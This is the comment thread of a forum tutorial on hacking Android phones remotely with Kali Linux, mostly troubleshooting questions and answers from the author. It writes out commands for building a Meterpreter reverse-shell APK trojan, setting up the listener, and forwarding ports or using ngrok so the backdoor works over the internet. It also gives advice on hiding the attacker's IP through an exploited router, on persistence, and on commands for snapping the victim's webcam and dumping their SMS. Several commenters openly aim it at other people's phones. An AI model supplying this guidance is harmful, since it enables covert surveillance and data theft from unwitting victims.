How To: Hack Android Using Kali (Remotely)

did you make a tutorial on that issue? I am interested in finding out how to go around this.

Hello F.E.A.R, I am completely new on this but wouldn't building the trojan with my public IP generate a direct communication to my modem which could be used to track me down? If so, how could that be avoided? Thank you very much!

Yes, best to have it connect via other sources...

I would personally suggest NGROK, NGROK can handle around 40 inbound connections and its free. If you are expecting more inbound connections than that, I would suggest using a bulletproof VPS or an exploited router to handle the rerouting of connections.

F.E.A.R thank you for upload such a great post. i am well aware with RAT tools but only with Personal Computer domain. so i will not ask you many questions but please kindly tell me which version of KALI LINUX would you prefer us to install on vmware to make the apk file for this task. it will be good if you directly provide the download link for Kali Linux Version for VMWare. Thanks in Advance

Hi F.E.A.R.
I would need your help.
I just started my adventure with Kali Linux im using windows 10 and i had a porblem at the start of trojan permission was deneid please help me out.
Regards EvilPK

Hi I have the same issue have you fixed it yet cuz I have the same issue with same exact command

Im not an expert at all, but since u typed root there, and it says permission denied I guess u have to use sudo to get higher permission on your user, then it should work

you must be root

use msfvenom instead of msfpayload give it a try

become root by 'sudo su' command

Msf -p android.......

So i tried and i got error bash: command msfpayload not found. I do have metasploit installed
EDIT: tried msfvenom. Got this
Welcome to Kali in UserLAnd!
system32@localhost:~$ sudo msfvenom android/meterpreter/reve
rse_tcp LHOST={ip hidden for reasons} R > /root/Upgrader.apk
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom options <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tc
p LHOST=<IP> -f exe -o payload.exe

Options:
-l, --list <type> List all modules for t
ype. Types are: payloads, encoders, nops, platforms, archs,
encrypt, formats, all
-p, --payload <payload> Payload to use (--list
payloads to list, --list-options for arguments). Specify '-'
or STDIN for custom
--list-options List --payload <value>'
s standard, advanced and evasion options
-f, --format <format> Output format (use --li
st formats to list)
-e, --encoder <encoder> The encoder to use (use
--list encoders to list)
--sec-name <value> The new section name to
use when generating large Windows binaries. Default: random
4-character alpha string
--smallest Generate the smallest p
ossible payload using all available encoders
--encrypt <value> The type of encryption
or encoding to apply to the shellcode (use --list encrypt to
list)
--encrypt-key <value> A key to be used for --
encrypt
--encrypt-iv <value> An initialization vecto
r for --encrypt
-a, --arch <arch> The architecture to use
for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payl
oad (use --list platforms to list)
-o, --out <path> Save the payload to a f
ile
-b, --bad-chars <list> Characters to avoid exa
mple: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of l
ength size on to the payload
--pad-nops Use nopsled size specif
ied by -n <length> as the total payload size, auto-prependin
g a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the
resulting payload
--encoder-space <length> The maximum size of the
encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to
encode the payload
-c, --add-code <path> Specify an additional w
in32 shellcode file to include
-x, --template <path> Specify a custom execut
able file to use as a template
-k, --keep Preserve the --template
behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variab
le name to use for certain output formats
-t, --timeout <second> The number of seconds t
o wait when reading the payload from STDIN (default 30, 0 to
disable)
-h, --help Show this message
system32@localhost:~$

you have to add a "-p" next to the msfvenom command

Although I have enable the option of unknown sources the apk file is not getting open on the android device what could be the reason? however It gets open on blackberry Q5 though attack was not successful

I followed all the steps but at the end after entering the command "exploit" later i get stuck in loaing payload handler" solution

Help.

me too ..... i dont get any response

I allready new this for years, and it worked fine. But when I want to hack the same phone again, it says that it is allready installed. So I deleted it and reinstalled it again, but still the same, how to solve the prob.

i think if you change the name of your apk then it will work

i know im super late but i was having the same problem when i first started out.. you have to uninstall "mainactivity" using an app called "ez file explorer" and after that use "clean master" to clean junk files. this works for me all the time.

How could this possibly work on WAN if you do not add a reference to your listening server as in:
'Even if you are hacking on WAN type your private/internal IP here not the public/external'

Am I missing something?

Yes you are my friend,

In the first terminal where you prepare the apk file, has to be encoded with your Public/External IP , so that when the file is opened it tried to connect to specific Network

While, you have to start the listener with your Private IP because it tells the listener that, which PC in the network, will be used to control the Remote Android/PC

hello F.E.A.R thanks for writing this great article. Im pretty new at doing this and i have one problem, when i open the app on my android device it opens a meterpreter session like normal but then i get this: Failed to load extension: No module of the name extserverandroid.jar found. Is there any way to fix it?

Hi James,
You mean do you type in a module, or it happens automatically ?
Try it on another android, and then comment again.

(I had this same issue) EDIT/DELETE: Nevermind, seems to be working now... though I honestly don't know what I did differently this time. Thanks for the clear, fun tutorials!

You are Welcome Wolf.

My router asks me to choose type of service while port forwarding. What do i select ?
Options are:
FTP
HTTP
ICUII
IP_PHONE
NetMeeting
News
PPTP
Quake II/III
Real-Audio
Telnet

One question. How do I send it to the victim? Do I install in my phone and then send it to the victim? I am lost at the part.

my window just gets stuck on the listening stuff .... even if i open the app i dont get any prompt here ... help me please

i use kali in vmware and i installed the app on my own phone with all permissions ..

Hello FEAR.. I have similar issues and I use my smartphone as Network hotspot. It worked earlier until I used ngrok and it has been stucked.

What approach do you suggest I follow.
Hope you get back to me asap. Thank you

If you are doing this over WAN you would need to port forward, use NGROK or use a VPS. These are the easiest methods.

This is really great tutorial. I will give it a try....
Thanks

You are Welcome ASANTE!

Please help me F.E.A.R. I have tp-link wifi and cannot forward ports even though I have configured tp link from his site (my network mask), canyouseeme.org and other sites cannot detect my opened ports!

Thanks in advance.

oh and i forgot to write my subnet mask - 192.168.0.1

Hi Aiden,
Configure them from this site: http://www.portfoward.com/
Even if you have configured them correctly, your ports Will not open they will get forwarded.
Just try hacking an android/PC on WAN.
If it still doesn't work, try allowing those ports through your router's firewall or try DMZ.

um...that's not your subnet mask.

Hey there,GRAT tutorials!

Btw, why should we forward port number 80? isn't that the webserver's poer?

**I have a Jiofi Router M2, I have tried a lot, but wasn't able to port forward it@@@
Please help me!!!!

Hi! Great tutorial sir!

I'm a complete noob at this and started learning a few days back only. I'm actually planning on running an exploit via an adobe reader or ms word document with meterpreter payload. But I need to do it on WAN (over the internet). I did it successfully on LAN but can't figure out or find good reference about how to go about it on WAN.

Could you explain the port forwarding procedure and concept in detail? Maybe help me specifically with my case..
Thank You!

Anytime AMAN!

1st Do you know what is public IP? If yes put the public IP in the first terminal and the private IP in the second terminal.

2nd For port forwarding you have to forward some default ports used by Kali like 4444 and 80. Do this by going to the advanced tab of your router config. Then port forwarding/triggering section or simply service section. And then forward ports accordingly.

I don't know which router do you use, please specify the name and model no. Of your router, then I can explian the steps to you.

Hey in one of your articles you mentioned you can help with port forwarding. Im having trouble pulling of a Social Engineering attack in Kali Linux because I am unable to do it over WAN because I dont know what I am doing wrong. I've seen many tutorials that try to show how to do it, but it is difficult because none of the interfaces are the same as mine. I try to figure it out and fill in the right information in where I think it's supposed to go, but the SET attack still only works over LAN even though I put in my external IP. Your help would be gratly appreciated please. The router is a Belkin router. The model number is:

F6D4230-4 v1000

Hi Ray!

Solution:
HERE

The steps are the same even if interfaces are not.

• Use kali's Internal IP
• Forward Ports 4444 and 8080
• Service Type: TCP/UDP

If you are using VMware, then switch off your anti-virus's firewall.

ALSO! GOTO FIREWALL RULES(in your router's config screen), AND ALLOW THOSE SERVICES THROUGH, IF IT DOESN'T WORK.

Another SOLUTION,
If you have the default DMZ option, enable it! This will forward all the ports.

ALSO, this wont open ports, it will only forward them, so if you use some testing port open services, they will tell that the ports are closed SO, don't worry.

Welcome to Null-Byte,
It is complex but..., here...

i understand that port forwarding is necessary for other devices to connect to us.....i dont have a router nd i use kali either on a live bootable usb or in vmware. now while using the live usb i cant connect to the internet using my data card nd so i use my mobile hotspot but in vmware i use NAT to connect.can i forward ports in vmware.

in kali i use nmap with my ip nd see dat all ports are closed.

NAT in VMware? and Port-forwarding? Not a chance.
Switch to bridged.

Comment-Edited/Deleted

I was referring to Aman because he said he was planning to do an exploit using pdf's and .doc files. That's why my reply was placed under his comment. But good to know that you've been reading OTW's posts.

(Intense Laughter)
Oops, I should have checked before answering,
Sorry Lemon, I'll edit it.

LOL. It's okay :)

Finally somebody has a tutorial about MSF on WAN ! thanks a LOT !

Sir, im using huwei BM632w router, and i have two options under NAT tab: "port forwarding" and "port mapping" .

which one should i use?

ps: they both have the same options

ARMIN:
Use port forwarding option,
Add custom service,
Name: (Any)
Type: TCP/UDP
Start Port: 4444
End Port: 4444
Apply.
If that doesn't work then:
Goto to Firewall Settings: And,

Outbound services: Select service name (the same name you put before), Action: Allow, LAN Users: Any, WAN Users : Any, LOG: Never

Apply
Inbound Services : Service Name: (same) Action:Allow ,Allow , Log: Never
Apply
If that doesn't work either let me know...

I am struggling for Port Forwarding like HELL...You wont believe how much tutorials and posts I've seen on this,but nothing succeeded for me.I've posted my problem on TP-Link,Huawei,Reliance support pages,but not yet a solution.I used Reliance 3g data card(Huawei EC156) to access internet.Then I realized port forwarding would'nt be possible without a Router.So,bought TP-Link TL-MR3420 3G Router.I port forwarded on routers page,didnt worked.Turned firewall off(both Bitdefender & Windows),not still.Switched DMZ on/off,not yet.Used couple softwares like PFConfig,Simple Port Forwarding,no luck.But still I am not losing hope.Please please if somebody knows a solution,I will be really helpful to you.I am so badly craving for Port Forwarding,only for online gaming,,and even a little of this stuff!

Did you get it fixed ? Even i'm not making any progress.

sir
im having two options port mapping and port triggering.

which one should i use?

http://portforward.com/

Find your own router and follow the process, they are not all the same. Don't forget to port forward to an IP, listener's one.

Thank You Ciuffy, now I dont have to worry about it

No problem, glad I helped.

Can u give me instructions on how to start

Hi FEAR,
Thanks for the interesting article.
However, being a newbie, I request your help in clarifying a few things:

1) I'm using Kali via USB (Cruzer Blade 8 GB). However, as I've been unable to install it, I'm using the Live (686-pae) option (I just selected the first option in the Boot Menu).

2) For Internet, I'm connected by data card via USB tethering (Android).

3) The problem is that every time I tether, the last three digits of my private IP address changes although the public one remains the same. So will this not create problems after the exploit on the meterpreter?

4) In Step 3: Set-Up a Listener, it says: Set up a (reverse) payload by typing : set payload android/meterpreter/reversetcp but in the sceenshot of the console below it, instead of android it is windows. Which is the correct word?

Hope to hear from you soon.

Thank you.

Welcome OMEGA7:

• Are you sure your public IP is static(remains same)
• Your Private IP/Public IP cannot change until your router reboots of if you restart your PC (or after everytime you tether) even if its dynamic.
• While exploiting on LAN or even on WAN you should have no problem.
• Just change the LHOST everytime you start up the attack.

------------------------------------------OR-----------------------------------------------

• Simply make it static by following these steps:
• Navigate to: /etc/network/interfaces and open it.
• Delete this line: iface eth0 inet dhcp
• Add this instead: iface eth0 inet static
• Now add these to configue the static IP:(all in different lines)
• address 192.168.0.5 (your STATIC IP)
• netmask 255.255.255.0 (netmask: Let it be this)
• network 192.168.0.0(Let it be this)
• broadcast 192.168.0.255(Same)
• gateway 192.168.0.1(Same)
• Save it ... and restart Kali, the changes will be permanent
• However, if the net doesn't work then you will have to put these cmds in a terminal everytime you start kali:
• ifconfig eth0 down
• sudo dhclient eth0
• ifconfig eth0 up

------------------------------------DONE---------------------------------------------------

Also your last query, Thank you for pointing out the mistake in the screenshot, the correct cmd is : set payload android/...

Thanks FEAR,

You're right. I rechecked it and the public IP too keeps on changing. As I mentioned before, I'm a tyro and am starting from scratch and I'd appreciate it if you could kindly tell how to navigate to "/etc/network/interfaces". I tried right clicking etc, to no avail.

Thanks

omega 7 how did u get the data card working???
whenever i plug in my usb data card it says not able to mount???

OK Got it!
But the first and second lines are:
auto lo
iface lo inet loopback

What should I do? Delete these and type in all the details that you have given or write the details without deleting these two lines?

Now I've inserted the data card into a micromax modem and have wifi.

The details of the new connection are in the screen shot attached. Please let me know whether the configurations mentioned earlier are relevant to wifi connection too.

.... the attach link isn't working... when I click on it, the 'Upload New Image' link is not active... OK... Doing it the hard way...

Logging out of Kali. shall try to send you on win 7

Thanks

OK. Strange! In Kali, I couldn't upload. Please revert at your earliest.
Thanks

Sorry for the late reply Omega7,
I don't think your private IP will change after you have connected to a WiFi with that type of IP
Even if it does let it change don't worry about it, it won't interfere in the hacking process.

But if the public IP is dynamic, and you hack anything on WAN then the meterpreter prompt will stay until your router reboots(as the IP will change after reboot)

So, don't worry keep hacking!

Thanks a ton, FEAR, much appreciate it.
But what about my other query?

"But the first and second lines are:
auto lo
iface lo inet loopback

What should I do? Delete these and type in all the details that you have given or write the details without deleting these two lines?"

Thanks for your time.

Let it be same don't delete anything don't add anything,
It would work just fine(I just saw that you are using a live Kali system, so the changes will revert anyhow)
Just change both, LHOST every time you hack on LAN and on WAN.

I updated my kali to 1.1.0 and i can't use msfpayload anymore. It is telling me to use msfvenom. But I don't know the command format for msfvenom if I am trying to do this android hack.

Hi Lemon,
Well, the command for payload in msfvenom has a slight difference,
To create the apk type :

• msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 -r -f apk > /root/ABC.apk

I never have really use msfvenom before, I hope the command works.. If not refer this:HERE

Thanks F.E.A.R. I'm gonna try that in a little while.
Soon you will be using msfvenom since msfpayload is deprecated. And it will be removed on or about 2015-06-08.

You are always welcome Lemon,
And thanks for the info.

Hello, F.E.A.R.
Thanks for beautiful article.
But I have some problems with creation APK file.
msfpayload is deprecated!

# msfvenom -p android/meterpreter/reversetcp LHOST=192.168.120.102 -r -f apk > /root/Update.apk
Invalid option
(copied from comment above)

# msfvenom -p android/meterpreter/reversetcp LHOST=192.168.120.102 -f apk > /root/Update.apk
Invalid Format Selected

And list of supported formats not contains APK

# msfvenom --help-formats

Executable formats: asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform formats: bash, c, csharp, dw, dword, java, jsbe, jsle, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript_

Can you help me?

As I told BAD, I haven't used msfvenom, and I my have to reinstall Kali due to tech problems, so I can't test it, you should refer to OTW's post (link above?)

Try this:

• msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 R > android.apk

Hey, I followed all your steps, but when I start the.apk file, my smartphone does nothing and my screen is still by starting the payload handler. What am I doing wrong?

Hi ARCHIBALD,

• After installing the file you also have to open it and your smartphone has to do nothing, only the meterpreter should show up
• Are you sure you had put down the correct LHOST ?
• Are you hacking on WAN or LAN ?
• A screenshot would help

Hi F.EA.R,

Thanks for the fast answer. I tried this on Virtualbox, so I dunno if my LHOST is correct, it's something strange like 10.0.0.2. I'm hacking on LAN and with a smartphone with android 4.4.4 KitKat. I'll send a screenshot as fast as possible.

You have copied the LHOST by typing ifconfig in a terminal right?

----------------------------------------------------------------------------------------------------
Or if you are using a wireless adapter to connect to a router then:
----------------------------------------------------------------------------------------------------

If the LHOST is 10.0.0.2 , even that should be correct. Modern routers are using that kind of IP. (However you can change it)

...
Also, which option are you using in the virtual box for Network Adapter?
(Bridged, NAT or Host-Only)

Yeah, that's right, I used the eth0 address and copied it to the LHOST. In Virtualbox, I'm using NAT.

Switch to bridged, always keep it bridged
Edit: also tick the option- Replicate physical network connection state

HI! I'm back and have been running around in circles with the process. I got a new broadband connection set up and am using a Binatone DT 850 W router. Could you PLEASE explain everything in detail, again perhaps. The objective, getting meterpreter running on a remote system over the internet by sending a malicious file over. I would REALLY appreciate your help again sir.

Welcome back Aman,

I am assuming that you know how to go to the configuration page of the router.
(If not then: Click Here
Username: "admin" Password: "admin"or"password"or"leave it blank")
If your router's config page interface is like this:

Then follow this guide:Here

Else, give me the screenshot of you router's configuration page.

Done!
What next sir?

i see you're dong pretty well but you should explain it a bit more that would be find for beginners.. :p

I don't think there is anything more to explain in this guide, if anyone needs it, he/she is free to ask in the comment section, Right Here.

Hi F.E.A.R. Not sure if you're still active in here after 5 years, but if you have the time I could really use your help and knowledge. Just need you to walk me through some things and help me understand. I can pay you for your time

Comment-Deleted

can i have question .. After installing apk and running it .. can person uninstall it then and will be it still running?..And if android phone will be turned off and on .. do i have to just exploit or person needs to run again application?

Hi Martin,
1) If the apk is uninstalled, the session will also end.
2) If the phone is rebooted, the session will still end.
3) However there are a few tricks by which you can make the backdoor persistent.

Well, next problem:
Whatever I type in, it's showing me:
Unknown command: ls
Unknown command: webcamlist
I think you understand

Hi Archibald,
1) Type pwd or lpwd or cd sdcard then type ls, it will work.
2) And its webcam_list not webcamlist.

Hi F.E.A.R

I embed the payload/trojan into the original apk which in my case it's ADM.apk then sign it , after I install the apk it works properly and as long as the android device is connected to WiFi I can do everything from msfconsole like downloading or webcamsnap or dumpsms etc. but when I turn off the wifi and turn the mobile data on ( I set it on 2G because the victim that I want to install the apk on his phone has 2G!!!!! and I want everything to be the same as his situation) in my msfconsole I just can do the core commands like "run" and if I try all the other commands it will say something like :

Unknown command: ls
Unknown command: pwd
I just can get his ip. but the problem is when I locate him it shows the wrong location.
what should I do to make the other commands work properly on mobile data like they work properly on WiFi?
I appreciate your answers. Thanks

I'm doing something wrong on the setting of my router?

everything work when the smartphone is connect to the same wlan, but with wan it doesn't start

Thanks a lot

Hi Angelo!
You have successfully forwarded port 4444, but it seems your firewall is blocking this port.

Goto firewall in your router configuration, and Select the port/service, then Allow all the inbound and outbound rules for that service, also give the Private IP of Kali if asked.

Done! Now follow the steps correctly for WAN method.
If it does not work, get me a screenshot.

FEAR,

My android said it "Can't Open File" i set it to accept from uknown sources. But it still says it cannot open it. So i downloaded an APK installer and installed it but still cannot open it. Also does this exploit have to be done with 2 cellphones can i just copy the APK file straight rom my root folder to the download site, because i see one of your steps is to first copy the file to your android phone.

Buckeroo,
Try this on another android, if it still doesn't work then maybe the command for creation of the apk is wrong.
No, you need only one cellphone ( 2, if you are hacking using a cell)
Yes you can directly copy/upload the file from your root folder.

I have the same problem on two different android devices

Bro, Please help me out with port forwarding for this, im kind of new,

Also im having an ZTE ZXV10 W300 router, I dont have a static IP it changes every time i restart the router,

also should i install NOIP for this?

I hope your Router's Interface is like, in this guide: /here

Forward port: 4444 and 80 (or 8080)
If any problems might occur, you are free to ask.

And no you shouldn't use NOIP is doesn't make your IP static, however you can use it to keep checking on your IP. (I think every 5 min)

Wow! Thanks F.EA.R for the tut.

I tried it on one of my droids and it works. I have a question though, where is the trojan directory that it is installed in located. I tried to remove it from my android and I cant seem to find it or anything. Its like stuck on there unless I disconnect from my side. Sorry for the newb question. Thanks for everything!

Welcome! James,
The Trojan's default name is Main Activity (application name),
Search for it in the application manager, and uninstall it, from there.

hey, i'm new here and i think i did everything good but i can't find the app i created (named it upgrade.apk).

Name of Application: Main Activity (though you can change it)
EDIT: Main Activity.apk

I think u can find it in your home folder

Why Meterpreter session closes nearly after 20-30 sec. after opening and the REASON is DIED?????

Antivirus (especially CM and when you are hacking on WAN)

So what is the solution???????

Also...how to hack the android using Kali me and the going to be the 'Victim" are on different network???

Could you re-frame the question please? If you are asking hacking on WAN, this guide shows that too.

Uninstall antivirus...

The problem was resolved by uninstalling the antivirus and now have a question that.......after I forward a port in my TP-LINK WR841N router by adding a virtual service and then check for it by nmap it is giving the result that all 1000 ports are closed..why???

One more thing I noticed that whenever I try to hack my Samsung Smartphone it opens a meterpreter session and then get close after 20-30 seconds but when I try hack my Micromax Smartphone it gets hacked and I use it until I want.Do Samsung Phones are more secured????

Yes, I think Samsung smartphones have an in-built security checking system. (I faced problems with Samsung too)

Port forwarding and opening ports are two different things.
Once you've forwarded the port (4444) That means you are good to go.
(If it doesn't work, allow those ports through the Firewall of your router)

Hello!
How to port fowarding on PROLiNK H5004NK ADSL Wireless Modem?

Hi! I am having some issues with the meterpreter "webcam_snap". When I try webcam_snap 1 or webcam_snap 2 they both take a picture on the back facing camera. Do you know how I can do it on the front facing camera?

Hi! Cameron,
Hmm.. Try this: webcam_snap –I 2
Or try Streaming : webcam_stream 2
Or this: webcam_stream –I 2
When you run the command webcam_list then you get a list of two webcams (1. front camera and 2. back camera) right?

Hey man first of all I have to tell you this is an amazing tutorial a big thanx for it. Secondly I have done all the things u said but can't go beyond a step I.e near the last step it says starting payload handler and is stuck on that. What should I do to fix it NAD yeah I m a noob so a little less technically will be appreciated thanx in advance man

And ya some more tutorial are expected from you bro !! Keep on posting

Hey man so now its working but I can't take picture from the webcam it says error running command webvam snap: NoMethodError undefined method value for nil : Nil class mic recording also don't work and ya how do I read message ?? DumpSMS command doenot work !! Thanx man

you can see the available commands by typing ?

yes its true question mark.
it pops all commands available to exploit

You are welcome RAY,
The command is; webcam_snap NOT webvam_snap. Also type this: webcam_snap 1 it will work.
For messages type dump_sms instead of Dump_SMS. Tell me the error If it still doesn't work.

hi FEAR thanx for such a fast reply actually that was just typing mistake i typed exactly what you have said and the error still continues man. plus when i type help commands for android doesnot shows up. the error when i type webcamsnap 1 is

error running command webcam snap: NoMethodError undefined method value for nil : Nil class
so what should i do ? i type the correct command stills shows this one.
should i attach a snapshot of error?? thanx again man

I think you should try this on another phone, if it works, then the problem is with the phone not with your commands or Kali

n ya i am the same guy as above !! just forgot my user name so using another account !! oops!!

Your username is: christopherray

ok so how do i upload a scrrenshot??

You click on the little picture icon that says "add an image" when you hover over it.

OK then fear I tried this on another phone and most of the command are working but still none of the android commands are working man!! like dumpsms and all what am I doing wrong then??

OK then, tell me the error.. Try the checking its root (I think the cmd is check_root) If it tells the device is not rooted then the cmds may not work. (You don't need to root your device just run this cmd in meterpreter)

ryuto555# msfpayload android/meterpreter/reverse_tcp lhost=[THIS IP] R > upgrade.apk

what ip should i add here[THIS IP]if im going to hack thru WAN ?

Public/External IP

hey F.E.A.R bro, first of all thanx for the tutz ;)

i need the tutorial that working on wan, and it must be a persistant one. can you mail me the complete step to make the backdoor (wan based) and the persistent backdoor

email : solothehacker@gmail.com

:) thank you bro. and thank you for the email. :P
the tutorial you added in that link, will it work on wan, i mean will it work through internet

Welcome! SHacker,

Yes the guide will work on WAN, until, the android system reboots or your Public IP changes (but if the phone is rooted and you have a Static IP, then it will work forever.

These things have been mentioned in the guide. (Also, the guide is here on Null-Byte)

thankuuuuuuuu : broi

Anytime! SHacker

Great! all other ways to make a persistence backdoor didn't work. I'm looking forward to your great tutorial. Could you please share your tutorial's link here?

hello i tried following step in backtrack 5 R3 but getting these errors..pls check it...

while creating .apk file getting error but still file created.
and while installing file on android it says "there is problem while parsing the package"
please help

You spelled android wrong while creating the payload.

this parsing error is occurring on android 5.x.x devices. on of my devices which had 4.4.2 allowed installation of androrat and the metasploit reverse tcp, however, after a upgrade to lolipop i started getting a parsing error when trying to install the RAT

Hi to everybody! Anybody knows if is something wrong with "webcamsnap" in the last version of metasploit? For me it doesn't work anymore after upgrade to Framework Version: 4.11.1-2015040202.I've try to create the payload with both "msfpayload" and "msfvenom" but I've got the same result:

"webcamstream" doesn't work neither,it open the webpage but no image it's shown.
The other commands are working well.

I'm using 3.18.0-kali3-amd64 (Kali Linux) installed on a HP 250 machine and I've try to exploit an Asus MemoPad 10 with Android 4.2.2 if that helps.

Thanx .

Hi Bobbe and Welcome to Null Byte!
Have you tried this command on another Phone/Android?
Maybe this Android System or an Anti-Virus Software installed, denies it to open/start webcam/camera.

Hi F.E.A.R and thanx.I didn't try yet but it was working just fine till I upgrade Metasploit,only with AV deactivated..I'll try to uninstall it to see if it works.Thank you again.

HI F.E.A.R,hello to everybody.I followed your suggestions but I get the same result..New device tested (Majestic branded phone tab with 4.2.2 Jelly Bean),no AV,no active firewalls but "webcamsnap" didn't work..Both tested devices are rooted..Have anybody any ideas?Anybody who use the same version of Metasploit who can confirm that the "webcamsnap" still work?Tests were made in both LAN and WAN..

Thank you!

Hello Bobbe,
Out of ideas, but if both devices are rooted, no problems should occur, I'll need some time to look into it.

HI.I'm out of ideas,too :) . I suspect some missing updates on Ruby for my version of Metasploit...or maybe is my machine that has some missing updates.I have no clue.One of this days I will try the on line version of Metasploit from Rapid7 to see if it work on it 'cos I think there it's a newest version than Kali's one..

Thanx for the answer and greets for the tutorials.Nice job!

I think uninstall metasploit and install it again. This should help.
Welcome Bobbe

Yup.But I'm not sure wich version should I install..
I think to downgrade to an oldest version..It was working fine before upgrade..
Thank you again!

I see an outdated version of ruby on my Kali...I don't know if upgrading that will help or messed up everything...What version-revision of ruby it use your metasploit?

I never updated my kali, and never will, until I know its verified, and only for custom updates (not random packages) (even metasploit)

Ruby version 1.9.1

Hello.I have to say that you are right. I've just reinstall the OS :) ,I messed up everything..now I have to test metasploit to see if it works. Thank you for the answer.Have a nice evening.

Welcome! Bob
You too have a good evening! (Its night here actually)

can we use noip on this?

I mean public IP, since we have dynamic IPs?

Hi Back,

I don't think we can use 'no-ip' on this, it takes time to refresh, but if you make the back door persistent , then, it may work!

Will try someday and let you know.

Hello , im a newbie and just beginning to learn Kali Linux,
Now , im dual booting live from a USB from my Desktop PC.

I dont find wlan as i dont have a wireless card and i think thats not a problem for now.

My IP addr is 192.168.1.101 and i can hack into any local android phone my APP is installed. But when the same app is opened by someone else from a distance of 1km or less, it dosent show up in my Kali Linux.

Another problem is can you explain me breifly how to hack them over WAN ( ie. by WAN Method ) as im really confused there.

Thanks and Regards,
xMidnightSnowx

hi folks,

i really dont check how this reversetcp works... in matter of.... when i shutdown or the owned device shut down.. this works either?

equal, i install the apk on e victims device, my Lhost is not working.. its works either? (logically not, but later) in a few hours? stops working or something like this? hows about more than 1 vic^ ... 10 on same port? can it handle 10-20? receiving host must be running is clear... etc... im a little confused ... is the Lhost almong running or is it ok to infect with the apk... like a one-hitwonder... or is it a always running gag.... thats was confusing me...

Re-frame the questions please!
My answer otherwise:
Unsinstall antivirus/Use persistent backdoor.
Yes 'it' can handle about 10, if the sessions are in background.
??

My router is TP-LINK TL-WR740N can you help me in port forwarding

My router is tp link wr74on and I am having a though time forwarding the ports. Can u help plz

Hi Guys!
Solution: Here
Use Kali's Internal IP, while forwarding ports.
EDIT: And forward ports 4444 and 8080

Is there a cammand to take a screen shot of a android device once you have exploited it ?
Or look at there chats on social networks

Just type screenshot in the Meterpreter shell.

I don't think that works does it?

Hi fear,

When i type exploit and it start then i click on the Phone the apk, i open it but doesn't work.. I tre to open The port but i don't know how

I have a netgear dgn 2200v4

Do you mean port forwarding the port? That is what you need to do for WAN.

Hi Andr,
You should mention whether you are hacking on LAN or WAN

excuse me sir . i got a problem . i always stuck at when i was configuring the WAN / wide area network. This is my screenshot always stuck at payloader handler. i try it on my smart phone but it didnt pop up on my kali . help will be appreciated . Thank you so much . sorry newbie :(

Looks like you almost did everything right!
I'll ask 3 questions:
1)while creating a payload did you mention your public IP?

2)Does your router configuration page, has a firewall settings option?, if yes then allow the inbound and the outbound services through this port.(if it has a DMZ option enable that too)

3)Do you click open after you install the file on the android?
And now try it again.

Hello,

I would like to point out that I am completely new; and I am trying this tutorial. However, in following your instructions, I was directed by a message in terminal to use msfvenom. I don't know what to do. Could you help me?

Solution:HERE

Try this: msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 R > android.apk
--------BUT--------

As told by BAD in the comments above msfvenom dies not contain the apk format. So just use msfplayload, Even if it tells to use msfvenom, just ignore it, check your root directory and you should see the file still has been created.

using this command line:
sudo msfpayload android/meterpreter/reversetcp HOST=192.168.1.16 LPORT=4444 R > apss.apk

Error:
Invalid payload: android/meterpreter/reversetcp

i don't know what to do. plz help me.

I guess you arnt using Kali Linux , because this former backtrack supports android payload

its reversetcp

'reversetcp''

Hey, i want to know if i want to send to somebody(not in the same Wireless or Wi-fi) i have to put in the Lport the external ip (public)?

Yes, but only while creating the payload.

lebz . i think if you want LAN only i think you need to put your internal IP.

Did i configured wrong ? on my router port forward ? help . cant connect at wan . Thank you

Please get me a screenshot of the security options. (Firewall)

this

Yes exactly!
But can you access the Internet after disabling firewall?
If yes, then good!
EDIT: Bold Text

nc -lvp 12345
listening on any 12345 ...
107.20.89.142: inverse host lookup failed: Unknown server error : Connection timed out
connect to 192.168.1.36 from (UNKNOWN) 107.20.89.142 48511

No, no, this process of port forwarding only forward the ports, it does not open them, Now your port forwarding has been a success!

Just follow the whole hacking process again.
(Also enable DMZ for the host's IP)

because i saw some video in port forwarding using netcat. is it wrong ? sorry newbie

No, but I won't recommend following it.
Can you access the internet after disabling (your router's) firewall?
Have you tried the procedure again?

ya i try and stil not pop up again .

and what is DMZ sir ?

An option in advanced settings, which forwards all the ports through firewall.
EDIT: If it is not in advanced settings, go to WAN settings.

noting DMZ enable or disable on my router . :(

my router didnt have DMZ enable / disable options brother

Actually it has, I saw that from the note of your screenshot above but nevemind now

hello bro.I'm new for kali linux. i have follow all the steps above bro but i get the error
Error running command webcamsnap: NoMethodError undefined method `value' for nil:NilClass

can you please help me wit it? I have use to different android phone but still got the error can i knw why? can please help me

webcam_snap 1
webcam_snap 2

its working on lan . but kinda hard on WAN. and F.E.A.R what is this problem ?
meterpreter > webcamstream 2
* Starting...
* Preparing player...
* Opening player at: UrXlVixg.html
* Streaming...

• webcamstart: Operation failed: 1

Nice! Antivirus is blocking the backdoor apk to access camera.

OK last try!
Exploit your android again by wan Method but this time connect the phone to the same WiFi router (Lan)

Is this exploit patched in the new android OS? I tried this on Vmware and no luck. Bridged connection/wifi/etho with kali installed on Vm. I wonder if this only works with a physical kali deployment? I recall one of my buddies did this hack in class with the USB boot of kali.

Wait seriously I'll have to check that out!
Thanks for the info Lee.

Fear, can you confirm that this exploit works on a Vm?

Yes it works on VM, and it has not been patched, however the in-built anti-virus, ends the meterpreter session quite fast!

EDIT: I cannot get enough time to initialize persistence.

My mistake FEAR, my firewall was indeed blocking me from the exploit. I noticed in bridged mode, I was able to ping Google's DNS but unable to actually browse the web; due to the firewall. Thanks for tutorial, now working both LAN and WAN for me.

Glad, it worked out!
Welcome!

i got still problem on WAN :| on LAN is GOOD but on WAN . i didnt see my smartphone on my kali response :(

hi!

